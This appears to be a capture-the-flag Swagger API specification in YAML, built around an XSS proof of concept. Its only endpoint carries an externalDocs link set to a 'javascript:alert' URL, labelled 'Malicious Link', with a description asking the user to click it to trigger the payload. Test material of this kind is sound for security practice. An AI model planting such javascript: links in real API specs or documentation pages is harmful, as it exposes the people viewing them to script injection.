swagger: "3.0"
info:
  version: "1.0.0"
  title: "CTF Swagger API"
  description: "payload"
host: "api.mrgreen.com"
schemes:
  - "https"
paths:
  /example:
    get:
      summary: "Example Endpoint"
      description: "Click the link to trigger the payload."
      responses:
        200:
          description: "Successful Response"
          schema:
            type: "string"
      externalDocs:
        description: "Malicious Link"
        url: "javascript:alert('XSS Exploit')"
